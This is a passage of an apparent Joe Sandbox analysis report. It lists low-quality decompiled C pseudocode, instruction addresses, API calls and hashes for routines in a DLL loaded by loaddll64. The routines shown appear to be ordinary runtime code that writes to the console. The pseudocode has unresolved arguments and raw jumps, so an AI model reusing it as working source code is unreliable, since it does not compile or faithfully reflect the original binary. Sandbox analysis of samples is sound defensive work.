                                                                                                        				r12d = r9d;
                                                                                                        				_t365 = _t364 + __r8;
                                                                                                        				 *((long long*)(_t336 - 0x71)) = _t365;
                                                                                                        				 *((intOrPtr*)(_t336 - 0x61)) = GetConsoleOutputCP();
                                                                                                        				if ( *((intOrPtr*)(_t367 + 0x28)) != dil) goto 0x289109f8;
                                                                                                        				0x28909140();
                                                                                                        				_t294 =  *((intOrPtr*)(_t367 + 0x18));
                                                                                                        				r8d =  *(_t294 + 0xc);
                                                                                                        				 *(_t336 - 0x5d) = r8d;
                                                                                                        				 *((long long*)(__rcx)) = _t269;
                                                                                                        				 *((intOrPtr*)(__rcx + 8)) = 0;
                                                                                                        				if ( *((intOrPtr*)(_t336 - 0x49)) - _t365 >= 0) goto 0x28910db8;
                                                                                                        				_t271 = __edx >> 6;
                                                                                                        				 *(_t336 - 0x21) = _t271;
                                                                                                        				 *((char*)(_t338 + 0x40)) =  *((intOrPtr*)(__r8));
                                                                                                        				 *((intOrPtr*)(_t336 - 0x7d)) = 0;
                                                                                                        				r12d = 1;
                                                                                                        				if (r8d != 0xfde9) goto 0x28910bc0;
                                                                                                        				_t347 = 0x3e + _t375 * 8 +  *((intOrPtr*)(0x7ffc28900000 + 0x7f940 + _t271 * 8));
                                                                                                        				if ( *_t347 == dil) goto 0x28910a74;
                                                                                                        				_t372 = _t329 + 1;
                                                                                                        				if (_t372 - 5 < 0) goto 0x28910a61;
                                                                                                        				if (_t372 == 0) goto 0x28910b52;
                                                                                                        				r12d =  *((char*)(_t294 + 0x7ffc2897e8f0));
                                                                                                        				r12d = r12d + 1;
                                                                                                        				_t181 = r12d - 1;
                                                                                                        				 *((intOrPtr*)(_t336 - 0x69)) = _t181;
                                                                                                        				_t341 = _t181;
                                                                                                        				if (_t341 -  *((intOrPtr*)(_t336 - 0x71)) - __r8 > 0) goto 0x28910d27;
                                                                                                        				_t295 = _t329;
                                                                                                        				 *((char*)(_t336 + _t295 - 1)) =  *_t347;
                                                                                                        				if (_t295 + 1 - _t372 < 0) goto 0x28910ab9;
                                                                                                        				if (_t341 <= 0) goto 0x28910aea;
                                                                                                        				E00007FFC7FFC289064D0( *( *((intOrPtr*)(0x7ffc28900000 + 0x7f940 +  *(_t336 - 0x59) * 8)) + 0x3e + _t375 * 8) & 0x000000ff, 0, __esi, __esp, _t336 - 1 + _t372, __r8, _t329, __r8, _t341);
                                                                                                        				_t318 = _t329;
                                                                                                        				 *((intOrPtr*)( *((intOrPtr*)(0x7ffc28900000 + 0x7f940 +  *(_t336 - 0x59) * 8)) + _t318 + 0x3e + _t375 * 8)) = dil;
                                                                                                        				if (_t318 + 1 - _t372 < 0) goto 0x28910aed;
                                                                                                        				 *((long long*)(_t336 - 0x41)) = _t329;
                                                                                                        				_t276 = _t336 - 1;
                                                                                                        				 *((long long*)(_t336 - 0x39)) = _t276;
                                                                                                        				_t186 = (0 | r12d == 0x00000004) + 1;
                                                                                                        				r12d = _t186;
                                                                                                        				r8d = _t186;
                                                                                                        				 *((long long*)(_t338 + 0x20)) = _t367;
                                                                                                        				E00007FFC7FFC28911744(_t276, _t289, _t336 - 0x7d, _t336 - 0x39, _t341, _t336 - 0x41);
                                                                                                        				if (_t276 == 0xffffffff) goto 0x28910db8;
                                                                                                        				_t331 = __r8 +  *((intOrPtr*)(_t336 - 0x69)) - 1;
                                                                                                        				goto 0x28910c55;
                                                                                                        				_t368 =  *((char*)(_t276 + 0x7ffc2897e8f0));
                                                                                                        				_t212 = _t368 + 1;
                                                                                                        				_t343 =  *((intOrPtr*)(_t336 - 0x71)) - _t331;
                                                                                                        				if (_t212 - _t343 > 0) goto 0x28910d55;
                                                                                                        				 *((long long*)(_t336 - 0x69)) = _t329;
                                                                                                        				 *((long long*)(_t336 - 0x31)) = _t331;
                                                                                                        				_t193 = (0 | _t212 == 0x00000004) + 1;
                                                                                                        				r14d = _t193;
                                                                                                        				r8d = _t193;
                                                                                                        				_t278 =  *((intOrPtr*)(_t336 - 0x51));
                                                                                                        				 *((long long*)(_t338 + 0x20)) = _t278;
                                                                                                        				E00007FFC7FFC28911744(_t278, _t289, _t336 - 0x7d, _t336 - 0x31, _t343, _t336 - 0x69);
                                                                                                        				if (_t278 == 0xffffffff) goto 0x28910db8;
                                                                                                        				_t332 = _t331 + _t368;
                                                                                                        				r12d = r14d;
                                                                                                        				goto 0x28910c55;
                                                                                                        				_t359 =  *(_t336 - 0x59);
                                                                                                        				_t351 =  *((intOrPtr*)(0x7ffc28900000 + 0x7f940 + _t359 * 8));
                                                                                                        				_t213 =  *(_t351 + 0x3d + _t375 * 8);
                                                                                                        				if ((_t213 & 0x00000004) == 0) goto 0x28910bf7;
                                                                                                        				 *((char*)(_t336 + 7)) =  *((intOrPtr*)(_t351 + 0x3e + _t375 * 8));
                                                                                                        				 *((char*)(_t336 + 8)) =  *_t332;
                                                                                                        				 *(_t351 + 0x3d + _t375 * 8) = _t213 & 0x000000fb;
                                                                                                        				r8d = 2;
                                                                                                        				goto 0x28910c40;
                                                                                                        				r8d =  *_t332 & 0x000000ff;
                                                                                                        				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t336 - 0x51)) + 0x18)))) + _t343 * 2)) >= 0) goto 0x28910c3a;
                                                                                                        				_t373 =  &(_t332[1]);
                                                                                                        				if (_t373 -  *((intOrPtr*)(_t336 - 0x71)) >= 0) goto 0x28910d93;
                                                                                                        				r8d = 2;
                                                                                                        				if (E00007FFC7FFC2890E960(_t213 & 0x000000fb, __ebp, _t289, _t336 - 0x7d, _t332, _t329, _t332, _t336, _t343,  *((intOrPtr*)(_t336 - 0x51))) == 0xffffffff) goto 0x28910db8;
                                                                                                        				_t333 = _t373;
                                                                                                        				goto 0x28910c55;
                                                                                                        				_t198 = E00007FFC7FFC2890E960(_t213 & 0x000000fb, __ebp, _t289, _t336 - 0x7d, _t333, _t329, _t333, _t336, _t365,  *((intOrPtr*)(_t336 - 0x51)));
                                                                                                        				if (_t198 == 0xffffffff) goto 0x28910db8;
                                                                                                        				_t334 =  &(_t333[1]);
                                                                                                        				 *((long long*)(_t338 + 0x38)) = _t329;
                                                                                                        				 *((long long*)(_t338 + 0x30)) = _t329;
                                                                                                        				 *((intOrPtr*)(_t338 + 0x28)) = 5;
                                                                                                        				_t280 = _t336 + 0xf;
                                                                                                        				 *((long long*)(_t338 + 0x20)) = _t280;
                                                                                                        				r9d = r12d;
                                                                                                        				_t345 = _t336 - 0x7d;
                                                                                                        				E00007FFC7FFC2890D698();
                                                                                                        				r14d = _t198;
                                                                                                        				if (_t198 == 0) goto 0x28910db8;
                                                                                                        				 *((long long*)(_t338 + 0x20)) = _t329;
                                                                                                        				r8d = _t198;
                                                                                                        				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x28910db0;
                                                                                                        				 *((intOrPtr*)(_t289 + 4)) = __esi -  *((intOrPtr*)(_t336 - 0x49)) +  *((intOrPtr*)(_t289 + 8));
                                                                                                        				if ( *((intOrPtr*)(_t336 - 0x79)) - r14d < 0) goto 0x28910db8;
                                                                                                        				if ( *((char*)(_t338 + 0x40)) != 0xa) goto 0x28910d10;
                                                                                                        				 *((short*)(_t338 + 0x40)) = 0xd;
                                                                                                        				 *((long long*)(_t338 + 0x20)) = _t329;
                                                                                                        				_t128 = _t280 - 0xc; // 0x1
                                                                                                        				r8d = _t128;
                                                                                                        				_t326 = _t338 + 0x40;
                                                                                                        				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x28910db0;
                                                                                                        				if ( *((intOrPtr*)(_t336 - 0x79)) - 1 < 0) goto 0x28910db8;
                                                                                                        				 *((intOrPtr*)(_t289 + 8)) =  *((intOrPtr*)(_t289 + 8)) + 1;
                                                                                                        				 *((intOrPtr*)(_t289 + 4)) =  *((intOrPtr*)(_t289 + 4)) + 1;
                                                                                                        				if (_t334 -  *((intOrPtr*)(_t336 - 0x71)) >= 0) goto 0x28910db8;
                                                                                                        				r8d =  *(_t336 - 0x5d);
                                                                                                        				goto 0x28910a23;
                                                                                                        				if (_t326 <= 0) goto 0x28910d50;
                                                                                                        				_t335 = _t334 - _t373;
                                                                                                        				 *((char*)( *((intOrPtr*)(0x7ffc28900000 + 0x7f940 + _t359 * 8)) + _t373 + 0x3e + _t375 * 8)) =  *((intOrPtr*)(_t335 + _t373));
                                                                                                        				if (1 - _t326 < 0) goto 0x28910d2f;
                                                                                                        				 *((intOrPtr*)(_t289 + 4)) =  *((intOrPtr*)(_t289 + 4)) +  *((intOrPtr*)(_t289 + 4));
                                                                                                        				goto 0x28910db8;
                                                                                                        				if (_t345 <= 0) goto 0x28910d8d;
                                                                                                        				_t327 = _t329;
                                                                                                        				_t361 =  *(_t336 - 0x19) >> 6;
                                                                                                        				_t356 =  *(_t336 - 0x11) +  *(_t336 - 0x11) * 8;
                                                                                                        				 *((char*)( *((intOrPtr*)(0x7ffc28900000 + 0x7f940 + _t361 * 8)) + _t356 * 8 + _t327 + 0x3e)) =  *((intOrPtr*)(_t327 + _t335));
                                                                                                        				_t328 = _t327 + 1;
                                                                                                        				if (2 - _t345 < 0) goto 0x28910d6d;
                                                                                                        				 *((intOrPtr*)(_t289 + 4)) =  *((intOrPtr*)(_t289 + 4)) + r8d;
                                                                                                        				goto 0x28910db8;
                                                                                                        				 *((char*)(_t356 + 0x3e + _t375 * 8)) =  *_t335;
                                                                                                        				 *( *((intOrPtr*)(0x7ffc28900000 + 0x7f940 + _t361 * 8)) + 0x3d + _t375 * 8) =  *( *((intOrPtr*)(0x7ffc28900000 + 0x7f940 + _t361 * 8)) + 0x3d + _t375 * 8) | 0x00000004;
                                                                                                        				_t174 = _t328 + 1; // 0x1
                                                                                                        				 *((intOrPtr*)(_t289 + 4)) = _t174;
                                                                                                        				goto 0x28910db8;
                                                                                                        				 *_t289 = GetLastError();
                                                                                                        				return E00007FFC7FFC28903A70(_t206,  *((intOrPtr*)(_t336 - 0x61)),  *((intOrPtr*)(_t289 + 4)),  *(_t336 + 0x17) ^ _t338);
                                                                                                        			}



















































                                                                                                        0x7ffc28910958
                                                                                                        0x7ffc28910966
                                                                                                        0x7ffc2891096a
                                                                                                        0x7ffc28910971
                                                                                                        0x7ffc28910979
                                                                                                        0x7ffc2891097d
                                                                                                        0x7ffc28910987
                                                                                                        0x7ffc2891098e
                                                                                                        0x7ffc28910995
                                                                                                        0x7ffc28910998
                                                                                                        0x7ffc2891099c
                                                                                                        0x7ffc289109a3
                                                                                                        0x7ffc289109aa
                                                                                                        0x7ffc289109ae
                                                                                                        0x7ffc289109bc
                                                                                                        0x7ffc289109c0
                                                                                                        0x7ffc289109cc
                                                                                                        0x7ffc289109d1
                                                                                                        0x7ffc289109d5
                                                                                                        0x7ffc289109d8
                                                                                                        0x7ffc289109db
                                                                                                        0x7ffc289109e5
                                                                                                        0x7ffc289109ee
                                                                                                        0x7ffc289109f3
                                                                                                        0x7ffc289109f8
                                                                                                        0x7ffc289109fc
                                                                                                        0x7ffc28910a00
                                                                                                        0x7ffc28910a06
                                                                                                        0x7ffc28910a09
                                                                                                        0x7ffc28910a10
                                                                                                        0x7ffc28910a19
                                                                                                        0x7ffc28910a1d
                                                                                                        0x7ffc28910a25
                                                                                                        0x7ffc28910a29
                                                                                                        0x7ffc28910a2c
                                                                                                        0x7ffc28910a40
                                                                                                        0x7ffc28910a5b
                                                                                                        0x7ffc28910a64
                                                                                                        0x7ffc28910a68
                                                                                                        0x7ffc28910a72
                                                                                                        0x7ffc28910a77
                                                                                                        0x7ffc28910a8f
                                                                                                        0x7ffc28910a98
                                                                                                        0x7ffc28910a9e
                                                                                                        0x7ffc28910aa0
                                                                                                        0x7ffc28910aaa
                                                                                                        0x7ffc28910ab0
                                                                                                        0x7ffc28910ab6
                                                                                                        0x7ffc28910abc
                                                                                                        0x7ffc28910ac9
                                                                                                        0x7ffc28910ace
                                                                                                        0x7ffc28910ada
                                                                                                        0x7ffc28910aea
                                                                                                        0x7ffc28910af8
                                                                                                        0x7ffc28910b03
                                                                                                        0x7ffc28910b05
                                                                                                        0x7ffc28910b09
                                                                                                        0x7ffc28910b0d
                                                                                                        0x7ffc28910b1a
                                                                                                        0x7ffc28910b1c
                                                                                                        0x7ffc28910b1f
                                                                                                        0x7ffc28910b22
                                                                                                        0x7ffc28910b33
                                                                                                        0x7ffc28910b3c
                                                                                                        0x7ffc28910b4a
                                                                                                        0x7ffc28910b4d
                                                                                                        0x7ffc28910b55
                                                                                                        0x7ffc28910b5e
                                                                                                        0x7ffc28910b66
                                                                                                        0x7ffc28910b6f
                                                                                                        0x7ffc28910b75
                                                                                                        0x7ffc28910b79
                                                                                                        0x7ffc28910b85
                                                                                                        0x7ffc28910b87
                                                                                                        0x7ffc28910b8a
                                                                                                        0x7ffc28910b8d
                                                                                                        0x7ffc28910b91
                                                                                                        0x7ffc28910ba2
                                                                                                        0x7ffc28910bab
                                                                                                        0x7ffc28910bb1
                                                                                                        0x7ffc28910bb4
                                                                                                        0x7ffc28910bbb
                                                                                                        0x7ffc28910bc0
                                                                                                        0x7ffc28910bc4
                                                                                                        0x7ffc28910bcc
                                                                                                        0x7ffc28910bd4
                                                                                                        0x7ffc28910bdb
                                                                                                        0x7ffc28910be0
                                                                                                        0x7ffc28910be6
                                                                                                        0x7ffc28910beb
                                                                                                        0x7ffc28910bf5
                                                                                                        0x7ffc28910bf7
                                                                                                        0x7ffc28910c07
                                                                                                        0x7ffc28910c09
                                                                                                        0x7ffc28910c11
                                                                                                        0x7ffc28910c1a
                                                                                                        0x7ffc28910c2f
                                                                                                        0x7ffc28910c35
                                                                                                        0x7ffc28910c38
                                                                                                        0x7ffc28910c47
                                                                                                        0x7ffc28910c4f
                                                                                                        0x7ffc28910c55
                                                                                                        0x7ffc28910c58
                                                                                                        0x7ffc28910c5d
                                                                                                        0x7ffc28910c62
                                                                                                        0x7ffc28910c6a
                                                                                                        0x7ffc28910c6e
                                                                                                        0x7ffc28910c73
                                                                                                        0x7ffc28910c76
                                                                                                        0x7ffc28910c7f
                                                                                                        0x7ffc28910c84
                                                                                                        0x7ffc28910c89
                                                                                                        0x7ffc28910c8f
                                                                                                        0x7ffc28910c98
                                                                                                        0x7ffc28910cae
                                                                                                        0x7ffc28910cbc
                                                                                                        0x7ffc28910cc3
                                                                                                        0x7ffc28910cce
                                                                                                        0x7ffc28910cd5
                                                                                                        0x7ffc28910cda
                                                                                                        0x7ffc28910ce3
                                                                                                        0x7ffc28910ce3
                                                                                                        0x7ffc28910ce7
                                                                                                        0x7ffc28910cf7
                                                                                                        0x7ffc28910d01
                                                                                                        0x7ffc28910d07
                                                                                                        0x7ffc28910d0a
                                                                                                        0x7ffc28910d14
                                                                                                        0x7ffc28910d1e
                                                                                                        0x7ffc28910d22
                                                                                                        0x7ffc28910d2a
                                                                                                        0x7ffc28910d2c
                                                                                                        0x7ffc28910d3e
                                                                                                        0x7ffc28910d4e
                                                                                                        0x7ffc28910d50
                                                                                                        0x7ffc28910d53
                                                                                                        0x7ffc28910d58
                                                                                                        0x7ffc28910d5a
                                                                                                        0x7ffc28910d61
                                                                                                        0x7ffc28910d69
                                                                                                        0x7ffc28910d7c
                                                                                                        0x7ffc28910d82
                                                                                                        0x7ffc28910d8b
                                                                                                        0x7ffc28910d8d
                                                                                                        0x7ffc28910d91
                                                                                                        0x7ffc28910d95
                                                                                                        0x7ffc28910da2
                                                                                                        0x7ffc28910da8
                                                                                                        0x7ffc28910dab
                                                                                                        0x7ffc28910dae
                                                                                                        0x7ffc28910db6
                                                                                                        0x7ffc28910de1

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.268118158.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.268112460.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268155215.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268319910.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268327950.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268343621.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268348129.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc28900000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                        • String ID:
                                                                                                        • API String ID: 2718003287-0
                                                                                                        • Opcode ID: d78e05eaa4b6556e9331e54f8ea1fb34517351267b85fce0062fd028625cc37f
                                                                                                        • Instruction ID: 4be2d833791e307044649b74fde4b2b29646d26cfa5a912fa78b01bf0da0106d
                                                                                                        • Opcode Fuzzy Hash: d78e05eaa4b6556e9331e54f8ea1fb34517351267b85fce0062fd028625cc37f
                                                                                                        • Instruction Fuzzy Hash: 3DD1FF22B08B9989EB11DF79DC402AC37B1FB05B99B144232CE5DA7BD9CE39E406C714
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 29%
                                                                                                        			E00007FFC7FFC2891129C(void* __ebx, signed int __ecx, void* __ebp, void* __esp, void* __rax, void* __rcx, signed short* __rdx, void* __r8, signed int __r9, void* __r10) {
                                                                                                        				signed short _v80;
                                                                                                        				void* _v92;
                                                                                                        				signed int _v96;
                                                                                                        				intOrPtr _v104;
                                                                                                        				intOrPtr _v108;
                                                                                                        				long _v112;
                                                                                                        				signed int _v120;
                                                                                                        				long long _v128;
                                                                                                        				signed int _v136;
                                                                                                        				void* __rbx;
                                                                                                        				void* __rsi;
                                                                                                        				void* __rbp;
                                                                                                        				void* _t107;
                                                                                                        				long _t116;
                                                                                                        				signed int _t117;
                                                                                                        				void* _t122;
                                                                                                        				signed int _t128;
                                                                                                        				intOrPtr _t146;
                                                                                                        				intOrPtr _t147;
                                                                                                        				void* _t169;
                                                                                                        				signed long long _t182;
                                                                                                        				signed long long _t186;
                                                                                                        				signed long long _t189;
                                                                                                        				signed long long _t208;
                                                                                                        				signed int _t209;
                                                                                                        				void* _t210;
                                                                                                        				void* _t212;
                                                                                                        				void* _t228;
                                                                                                        				signed long long _t229;
                                                                                                        				signed short* _t230;
                                                                                                        				void* _t231;
                                                                                                        				signed short* _t232;
                                                                                                        
                                                                                                        				_t122 = __ebx;
                                                                                                        				r15d = r8d;
                                                                                                        				_t186 = __r9;
                                                                                                        				_t230 = __rdx;
                                                                                                        				if (r8d == 0) goto 0x28911599;
                                                                                                        				if (__rdx != 0) goto 0x28911303;
                                                                                                        				 *((char*)(__r9 + 0x38)) = 1;
                                                                                                        				r8d = 0;
                                                                                                        				 *((intOrPtr*)(__r9 + 0x34)) = 0;
                                                                                                        				 *((char*)(__r9 + 0x30)) = 1;
                                                                                                        				 *((intOrPtr*)(__r9 + 0x2c)) = 0x16;
                                                                                                        				r9d = 0;
                                                                                                        				_v128 = __r9;
                                                                                                        				_v136 = _t209;
                                                                                                        				E00007FFC7FFC28909674(__rax, __r9, __rcx, __rdx, _t210, _t212, __r8);
                                                                                                        				goto 0x2891159b;
                                                                                                        				_t189 = __ecx >> 6;
                                                                                                        				_v120 = _t189;
                                                                                                        				_t229 = __ecx + __ecx * 8;
                                                                                                        				if (_t210 - 1 - 1 > 0) goto 0x28911339;
                                                                                                        				if (( !r15d & 0x00000001) == 0) goto 0x289112cc;
                                                                                                        				if (( *( *((intOrPtr*)(0x2897f940 + _t189 * 8)) + 0x38 + _t229 * 8) & 0x00000020) == 0) goto 0x2891134f;
                                                                                                        				r8d = 0x7ffc2897f942;
                                                                                                        				E00007FFC7FFC28911E38(r12d);
                                                                                                        				_v96 = _t209;
                                                                                                        				if (E00007FFC7FFC289116A0(r12d, __ecx) == 0) goto 0x28911485;
                                                                                                        				if ( *((intOrPtr*)( *((intOrPtr*)(0x2897f940 + _v120 * 8)) + 0x38 + _t229 * 8)) - dil >= 0) goto 0x28911485;
                                                                                                        				if ( *((intOrPtr*)(__r9 + 0x28)) != dil) goto 0x28911396;
                                                                                                        				0x28909140();
                                                                                                        				if ( *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x18)) + 0x138)) != _t209) goto 0x289113b2;
                                                                                                        				_t182 =  *((intOrPtr*)(0x2897f940 + _v120 * 8));
                                                                                                        				if ( *((intOrPtr*)(_t182 + 0x39 + _t229 * 8)) == dil) goto 0x28911485;
                                                                                                        				if (GetConsoleMode(??, ??) == 0) goto 0x2891147a;
                                                                                                        				if (sil == 0) goto 0x28911457;
                                                                                                        				sil = sil - 1;
                                                                                                        				if (sil - 1 > 0) goto 0x2891151e;
                                                                                                        				_t228 = _t230 + _t231;
                                                                                                        				_v112 = _t209;
                                                                                                        				_t232 = _t230;
                                                                                                        				if (_t230 - _t228 >= 0) goto 0x28911514;
                                                                                                        				_v80 =  *_t232 & 0x0000ffff;
                                                                                                        				_t107 = E00007FFC7FFC28911E40( *_t232 & 0xffff);
                                                                                                        				_t128 = _v80 & 0x0000ffff;
                                                                                                        				if (_t107 != _t128) goto 0x28911449;
                                                                                                        				_t146 = _v108 + 2;
                                                                                                        				_v108 = _t146;
                                                                                                        				if (_t128 != 0xa) goto 0x2891143a;
                                                                                                        				if (E00007FFC7FFC28911E40(0xd) != 0xd) goto 0x28911449;
                                                                                                        				_t147 = _t146 + 1;
                                                                                                        				_v108 = _t147;
                                                                                                        				if ( &(_t232[1]) - _t228 >= 0) goto 0x28911514;
                                                                                                        				goto 0x289113fa;
                                                                                                        				_v112 = GetLastError();
                                                                                                        				goto 0x28911514;
                                                                                                        				r9d = r15d;
                                                                                                        				_v136 = __r9;
                                                                                                        				E00007FFC7FFC28910958(0xd, r12d, _t147, __ebp, __esp, __r9,  &_v112, _t230);
                                                                                                        				asm("movsd xmm0, [eax]");
                                                                                                        				goto 0x28911519;
                                                                                                        				if ( *((intOrPtr*)( *((intOrPtr*)(0x2897f940 + _v120 * 8)) + 0x38 + _t229 * 8)) - dil >= 0) goto 0x289114e1;
                                                                                                        				_t169 = sil;
                                                                                                        				if (_t169 == 0) goto 0x289114cd;
                                                                                                        				if (_t169 == 0) goto 0x289114b9;
                                                                                                        				if (_t147 - 1 != 1) goto 0x28911529;
                                                                                                        				r9d = r15d;
                                                                                                        				E00007FFC7FFC28910EE8(_t122, r12d, _t182, _t186,  &_v112, _t212, _t230);
                                                                                                        				goto 0x2891146e;
                                                                                                        				r9d = r15d;
                                                                                                        				E00007FFC7FFC28911004(r12d,  *((intOrPtr*)(_t182 + 8)), _t182, _t186,  &_v112, _t212, _t230);
                                                                                                        				goto 0x2891146e;
                                                                                                        				r9d = r15d;
                                                                                                        				E00007FFC7FFC28910DE4(_t122, r12d, _t182, _t186,  &_v112, _t212, _t230);
                                                                                                        				goto 0x2891146e;
                                                                                                        				r8d = r15d;
                                                                                                        				_v136 = _v136 & _t182;
                                                                                                        				_v112 = _t182;
                                                                                                        				_v104 = 0;
                                                                                                        				if (WriteFile(??, ??, ??, ??, ??) != 0) goto 0x28911511;
                                                                                                        				_t116 = GetLastError();
                                                                                                        				_v112 = _t116;
                                                                                                        				asm("movsd xmm0, [ebp-0x30]");
                                                                                                        				asm("movsd [ebp-0x20], xmm0");
                                                                                                        				if (_t116 != 0) goto 0x28911592;
                                                                                                        				_t117 = _v96;
                                                                                                        				if (_t117 == 0) goto 0x28911568;
                                                                                                        				if (_t117 != 5) goto 0x28911558;
                                                                                                        				 *((char*)(_t186 + 0x30)) = 1;
                                                                                                        				 *((intOrPtr*)(_t186 + 0x2c)) = 9;
                                                                                                        				 *((char*)(_t186 + 0x38)) = 1;
                                                                                                        				 *(_t186 + 0x34) = _t117;
                                                                                                        				goto 0x289112fb;
                                                                                                        				_t208 = _t186;
                                                                                                        				E00007FFC7FFC2890B3DC(_v96, _t208);
                                                                                                        				goto 0x289112fb;
                                                                                                        				if (( *( *((intOrPtr*)(0x2897f940 + _t208 * 8)) + 0x38 + _t229 * 8) & 0x00000040) == 0) goto 0x2891157a;
                                                                                                        				if ( *_t230 == 0x1a) goto 0x28911599;
                                                                                                        				 *(_t186 + 0x34) =  *(_t186 + 0x34) & 0x00000000;
                                                                                                        				 *((char*)(_t186 + 0x30)) = 1;
                                                                                                        				 *((intOrPtr*)(_t186 + 0x2c)) = 0x1c;
                                                                                                        				 *((char*)(_t186 + 0x38)) = 1;
                                                                                                        				goto 0x289112fb;
                                                                                                        				goto 0x2891159b;
                                                                                                        				return 0;
                                                                                                        			}



































                                                                                                        0x7ffc2891129c
                                                                                                        0x7ffc289112b2
                                                                                                        0x7ffc289112b8
                                                                                                        0x7ffc289112bb
                                                                                                        0x7ffc289112c1
                                                                                                        0x7ffc289112ca
                                                                                                        0x7ffc289112cc
                                                                                                        0x7ffc289112d1
                                                                                                        0x7ffc289112d4
                                                                                                        0x7ffc289112da
                                                                                                        0x7ffc289112e1
                                                                                                        0x7ffc289112e9
                                                                                                        0x7ffc289112ec
                                                                                                        0x7ffc289112f1
                                                                                                        0x7ffc289112f6
                                                                                                        0x7ffc289112fe
                                                                                                        0x7ffc28911313
                                                                                                        0x7ffc28911317
                                                                                                        0x7ffc2891131b
                                                                                                        0x7ffc2891132e
                                                                                                        0x7ffc28911337
                                                                                                        0x7ffc2891133f
                                                                                                        0x7ffc28911346
                                                                                                        0x7ffc2891134a
                                                                                                        0x7ffc28911352
                                                                                                        0x7ffc28911368
                                                                                                        0x7ffc28911377
                                                                                                        0x7ffc28911381
                                                                                                        0x7ffc28911386
                                                                                                        0x7ffc289113a1
                                                                                                        0x7ffc289113a3
                                                                                                        0x7ffc289113ac
                                                                                                        0x7ffc289113c7
                                                                                                        0x7ffc289113d0
                                                                                                        0x7ffc289113d6
                                                                                                        0x7ffc289113dd
                                                                                                        0x7ffc289113e3
                                                                                                        0x7ffc289113e7
                                                                                                        0x7ffc289113eb
                                                                                                        0x7ffc289113f1
                                                                                                        0x7ffc28911401
                                                                                                        0x7ffc28911405
                                                                                                        0x7ffc2891140a
                                                                                                        0x7ffc28911411
                                                                                                        0x7ffc28911413
                                                                                                        0x7ffc28911416
                                                                                                        0x7ffc2891141d
                                                                                                        0x7ffc28911431
                                                                                                        0x7ffc28911433
                                                                                                        0x7ffc28911435
                                                                                                        0x7ffc28911441
                                                                                                        0x7ffc28911447
                                                                                                        0x7ffc2891144f
                                                                                                        0x7ffc28911452
                                                                                                        0x7ffc28911457
                                                                                                        0x7ffc2891145a
                                                                                                        0x7ffc28911469
                                                                                                        0x7ffc2891146e
                                                                                                        0x7ffc28911475
                                                                                                        0x7ffc2891148e
                                                                                                        0x7ffc28911492
                                                                                                        0x7ffc28911495
                                                                                                        0x7ffc2891149a
                                                                                                        0x7ffc2891149f
                                                                                                        0x7ffc289114a5
                                                                                                        0x7ffc289114b2
                                                                                                        0x7ffc289114b7
                                                                                                        0x7ffc289114b9
                                                                                                        0x7ffc289114c6
                                                                                                        0x7ffc289114cb
                                                                                                        0x7ffc289114cd
                                                                                                        0x7ffc289114da
                                                                                                        0x7ffc289114df
                                                                                                        0x7ffc289114ec
                                                                                                        0x7ffc289114ef
                                                                                                        0x7ffc289114f7
                                                                                                        0x7ffc289114fb
                                                                                                        0x7ffc28911506
                                                                                                        0x7ffc28911508
                                                                                                        0x7ffc2891150e
                                                                                                        0x7ffc28911514
                                                                                                        0x7ffc28911519
                                                                                                        0x7ffc28911533
                                                                                                        0x7ffc28911535
                                                                                                        0x7ffc2891153a
                                                                                                        0x7ffc2891153f
                                                                                                        0x7ffc28911541
                                                                                                        0x7ffc28911545
                                                                                                        0x7ffc2891154c
                                                                                                        0x7ffc28911550
                                                                                                        0x7ffc28911553
                                                                                                        0x7ffc2891155b
                                                                                                        0x7ffc2891155e
                                                                                                        0x7ffc28911563
                                                                                                        0x7ffc28911572
                                                                                                        0x7ffc28911578
                                                                                                        0x7ffc2891157a
                                                                                                        0x7ffc2891157e
                                                                                                        0x7ffc28911582
                                                                                                        0x7ffc28911589
                                                                                                        0x7ffc2891158d
                                                                                                        0x7ffc28911597
                                                                                                        0x7ffc289115ab

                                                                                                        APIs
                                                                                                        • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFC2891123C), ref: 00007FFC289113BF
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFC2891123C), ref: 00007FFC28911449
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.268118158.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.268112460.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268155215.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268319910.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268327950.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268343621.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268348129.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc28900000_loaddll64.jbxd
